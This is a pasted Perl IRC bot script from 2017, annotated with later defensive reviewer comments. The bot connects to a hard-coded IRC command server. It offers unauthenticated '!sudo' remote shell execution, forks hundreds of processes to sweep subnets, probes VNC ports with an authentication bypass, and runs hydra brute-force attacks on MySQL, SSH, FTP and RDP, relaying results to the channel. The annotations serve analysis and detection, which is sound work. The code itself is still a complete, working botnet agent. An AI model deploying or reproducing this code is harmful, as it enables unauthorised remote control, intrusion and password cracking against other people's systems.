independentt

IRC Bot (perl) by independent

Jan 15th, 2017
  1. #For educational purposes or for use on your network only
  2. #This script has been modified from the original source.
  3. #Thanks to the real owner of it.
  4. #Get on my IRC Network if you need explanations on how you can use this script.
  5.  
  6.  
  7. use IO::Socket;
  8. use IO::Socket::INET;
  9. use threads;
  10. use threads::shared;
  11. use Errno qw(EAGAIN);
  12. use warnings;
  # Reviewer notes (defensive analysis): global state plus the outbound control
  # connection. Nothing below reads arguments or a config file; the server, port,
  # channel and nick pattern are hard-coded, so they can serve as network
  # indicators when hunting for this script.
  13. my $lines;
  14. our @results : shared;
  15. our $todo = 0;
  16. our $contatore = 0;
  17. my $orig_thread = "yes";
  18. my $start;
  19. my $end;
  20. my $out_file;
  # $contatore and $out_file are not referenced again in the visible listing;
  # $orig_thread is only written (in DivideWork) and never read.
  21. my $range = 99999;
  22. my $random_number = int(rand($range));
  # Ports probed by Scan_ALL: ten VNC ports, then four login services that are
  # handed to an external hydra process.
  23. my @VNC_PORTS = qw/5900 5901 5902 5903 5904 5905 5906 5907 5908 5909/;
  24. my @hydra_PORTS  = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );
  25. my $splits = 8; # Creates 2^N processes.
  26. our $subnet;
  # Nick is the literal "b0t" followed by a random integer below 99999.
  27. my $nick = "b0t$random_number";# nick
  28. my $secureport = "6667";
  29. my $ircnet = "irc-1.iownyour.biz";
  30. my $canale = "#powercc";
  31. my $answer;
  # Plain TCP socket (IO::Socket::INET; no TLS layer appears in this code), so
  # everything sent over the control channel is readable on the wire.
  32. my $sk = IO::Socket::INET->new(PeerAddr=>"$ircnet",PeerPort=>"$secureport",Proto=>"tcp") or die "Can not connect on server!\n";
  33. $sk->autoflush(1);
  # IRC registration: USER and NICK lines carrying the generated nick.
  34. print $sk "USER $nick 0 * :Robot made by independent \r\n";
  35. print $sk "NICK $nick \r\n";
  36.  
  # Reviewer notes (defensive analysis): main command loop. Each line read from
  # the IRC socket is tested against a series of unanchored patterns, and the
  # tests run on the whole raw line; no visible code checks who sent the line or
  # which channel it came from. Any party able to get a line containing one of
  # these tokens delivered to the process can therefore trigger the handler,
  # including the command execution behind "!sudo".
  37.  while ($answer = <$sk>) {
  38.    
  39.     if($answer =~ m/^PING (.*?)$/gi) #Answer ping requests
  40.     {
  41.        
              # Keep-alive reply; the channel JOIN is sent again on every server PING.
  42.         print $sk "PONG ".$1."\r\n";
  43.         print $sk "JOIN $canale \r\n";
  44.     }
  45.     if ($answer=~ /!help/) {
  46.     printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
  47.   }
        # "!list": relays every line of xploits.log that contains "host" to the
        # channel. Scan_ALL appends the hydra output to a file of the same name.
  48.   if ($answer=~ /!list/)
  49.   {
  50.  
  51.     my $file = 'xploits.log';
          # A failed open only warns; the read loop below still runs on $fh.
  52.     open my $fh, '<', $file or warn "Could not open '$file' $!\n";
  53.  
  54.     while (my $lines = <$fh>) {
  55.       chomp $lines;
  56.       if ($lines=~ /host/) {
  57.         printa("$lines");
  58.       }
  59.     }
  60.   }
        # "!reload": the one-element list makes system() pass the string to the
        # shell, so "&&" chains three sudo commands. scan.pl is presumably this
        # script's own file name -- not shown in the listing.
  61.   if ($answer=~ /!reload/)
  62.   {
  63.     printa("Reloading...");
  64.     my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill hydra");
  65.     system(@cmd);
  66.   }
        # "!die": kills perl and hydra processes by name through sudo.
  67.   if ($answer=~ /!die/)
  68.   {
  69.     printa("Dying...");
  70.     my @cmd = ("sudo pkill perl && sudo pkill hydra");
  71.     system(@cmd);
  72.   }
        # "!sudo": everything after the token is appended to "sudo " and run
        # through the shell with backticks; the captured output (stderr and fd 3
        # are redirected into it) is sent to the channel line by line. With no
        # sender check, this is unauthenticated remote command execution with
        # whatever rights sudo grants the account running the script.
  73.   if ($answer=~ /!sudo\s+(.*)/)
  74.   {
  75.         my $command = $1;
  76.         printa("Done: $command ");
  77.     my $cmd = "sudo $command";
  78.     my @output = `$cmd 2>&1 3>&1`;
  79.     foreach(@output) {
  80.       printa("$_\r\n");
  81.     }
  82.   }
  83.  
  84.  
        # "!scan": accepts any argument that starts with three dot-separated groups
        # of 1-3 digits. Octet values are not range-checked and no allow-list
        # limits which networks may be scanned, despite the header comment about
        # use on one's own network.
  85.   if ($answer=~ /!scan (.+)/)
  86.   {
  87.  
  88.  
  89.     $todo = 0;
  90.     $subnet = $1;
  91.     if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
            # Keep only the first three octets and add the trailing dot.
  92.       $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
  93.       $subnet .= ".";
  94.       printa("Scanning subnet ${subnet}x\n");
  95.  
  96.       CHECK: {
  97.         unless ($splits >= 0 && $splits <= 8) {
  98.           die "ERROR: Do not split $splits times--that makes no sense.\n";
  99.         }
  100.       }
  101.  
             # $splits is fixed at 8 above, so all eight calls run; each call forks
             # every existing process once, giving up to 2^8 = 256 processes.
  102.       # Ugly, but this works.
  103.       DivideWork() if $splits >= 1;
  104.       DivideWork() if $splits >= 2;
  105.       DivideWork() if $splits >= 3;
  106.       DivideWork() if $splits >= 4;
  107.       DivideWork() if $splits >= 5;
  108.       DivideWork() if $splits >= 6;
  109.       DivideWork() if $splits >= 7;
  110.       DivideWork() if $splits >= 8;
  111.  
             # Each process derives its own slice of host numbers 0..255 from its
             # $todo index; with $splits = 8 the slice is a single host number.
  112.       $start = $todo << (8 - $splits);
  113.       $end = $start + (256 / (2**$splits)) - 1;
  114.  
  115.       foreach ($start .. $end) {
  116.  
  117.         Scan_ALL($_);
  118.  
  119.       }
             # No exit follows the scan, so every forked process returns to the
             # read loop above on the inherited socket. For responders: expect a
             # burst of perl processes sharing one outbound IRC connection.
  120.      }
  121.    
  122.    else {
  123.       printa("Are you brain-dead? Use a correct IP format. ");
  124.     }
  125.  
  126.   }
  127.  
  128. }
  129.   ####################################
  130.  
  # Reviewer notes (defensive analysis): splits the calling process in two with
  # fork and gives each half a distinct work index in the global $todo: the
  # index is doubled first, then the parent adds one and the child keeps the
  # even value. After N successful calls in every process there are 2^N
  # processes with indices 0 .. 2^N - 1. Takes no arguments, returns nothing
  # meaningful; it only mutates $todo and $orig_thread.
  131.   sub DivideWork {
  132.     my $pid;
  133.  
  134.     FORK: {
  135.       $todo *= 2;
  136.       if ($pid = fork) {
  137.         # Parent
  138.         ++$todo;
  139.  
  140.         } elsif (defined $pid) {
  141.         # Child
  142.         $orig_thread = "no";
  143.  
  144.         } elsif ($! == EAGAIN) {
  145.         # Recoverable forking error.
               # redo re-enters the block, so $todo is doubled again before the retry.
  146.         sleep 7;
  147.         redo FORK;
  148.  
  149.         } else {
  150.         # Unable to fork.
               # The failure is reported to the IRC channel; $todo stays doubled.
  151.         printa("Unable to fork: $!\n");
  152.  
  153.       }
  154.     }
  155.   }
  156.  
  157.  
  158.  
  # Reviewer notes (defensive analysis): probes one host, built as
  # $subnet . $hostnum, in two stages.
  #   1. On each port in @VNC_PORTS it walks through a VNC handshake in which the
  #      client announces security type 1 regardless of what the server offered,
  #      and flags the host when the server keeps sending data afterwards.
  #   2. On each port in @hydra_PORTS it makes a plain TCP connect; for the first
  #      port that answers it launches an external hydra run and returns.
  # Parameter: the last octet of the address. No useful return value; results go
  # to @results, to the IRC channel via printa, and to xploits.log.
  # Host artifacts visible here: the word lists /user and /pass, the file
  # xploits.log in the working directory, and sudo-launched hydra processes.
  # Exposure this targets: VNC servers with an authentication bypass reachable on
  # 5900-5909, and MySQL/SSH/FTP/RDP logins reachable for password guessing.
  159.   sub Scan_ALL {
  160.     my $hostnum = shift;
  161.     my $host = $subnet . $hostnum;
  162.     my $sock;
  163.     my $proto_ver;
  164.     my $ignored;
  165.     my $auth_type;
  166.     my $sec_types;
  167.     my $vnc_data;
  168.     $host or printa("ERROR: missing Host IP address Scan_ALL.");
  169.  
  170.     # The host numbers .0 and .255 are reserved; ignore them.
  171.     if ($hostnum <= 0 or $hostnum >= 255) { return; }
  172.  
  173.     # Format things nicely--that crazy formula just adds spaces.
  174.     $results[$hostnum] = "$host";
  175.     $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
  176.     foreach my $porti (@VNC_PORTS)
  177.     {
             # This inner "my $sock" shadows the outer one declared above.
  178.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti, Proto => 'tcp')) {
  179.  
               # Read the 12-byte version banner and echo it back unchanged.
               # None of the read() results in this block are checked.
  180.         $sock->read($proto_ver, 12);
  181.         print $sock $proto_ver;
  182.  
  183.         # Get supported security types and ignore them.
  184.         $sock->read($sec_types, 1);
  185.  
  186.         $sock->read($ignored, unpack('C', $sec_types));
  187.         # Claim that we only support no authentication.
  188.         print $sock "\x01";
  189.  
  190.  
  191.         # We should get "0000" back, indicating that they won't fall back to no authentication.
  192.         $sock->read($auth_type, 4);
  193.  
  194.         # Client initialize.
  195.         print $sock "\x01";
  196.  
  197.         # If the server starts sending data, we're in.
  198.         $sock->read($vnc_data, 4);
               # Announced for every port that accepted the TCP connection, before
               # the result below is evaluated.
  199.         printa("[Xploiting VNC] $host");
               # The only test is that the four bytes unpack to a non-zero integer.
  200.         if (unpack('I', $vnc_data)) {
  201.           $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
  202.           printa("9,3 [ $porti ] $results[$hostnum] $porti ");
  203.         }
  204.       }
  205.     }
  206.     foreach my $porti (@hydra_PORTS)
  207.     {
  208.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti->[0], Proto => 'tcp')) {
  209.         close($sock);
  210.         printa("[Cracking " . $porti->[1] . "] $host");
               # One-element list: system() hands the whole string to the shell,
               # which performs the ">>xploits.log" redirection.
  211.         my @cmdhydra = ("sudo hydra -F -L /user -P /pass $host " . lc($porti->[1]) . " -s " . $porti->[0] . " -v -t 4 -W3 >>xploits.log");
  212.         system(@cmdhydra);
               # Returns after the first open service, so later list entries are
               # not tried for this host.
  213.         return;
  214.       }
  215.     }
  216.  
           # The outer $sock is never assigned (the connections live in the inner
           # lexicals), so this close operates on an undefined value.
  217.     close($sock);
  218.     return;
  219.   }
  220.  
  # Reviewer notes (defensive analysis): sends its first argument to the
  # hard-coded channel $canale as a PRIVMSG over the global socket $sk, prefixed
  # with "4,5 " and followed by ". ". Every report in this script (scan results,
  # command output, errors) goes through here, so the channel traffic is the
  # place to look for what the process has disclosed.
  # NOTE(review): "4,5" is presumably the remainder of an IRC colour code whose
  # control character was lost in the paste -- unverified.
  221.   sub printa {
  222.     print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
  223.   }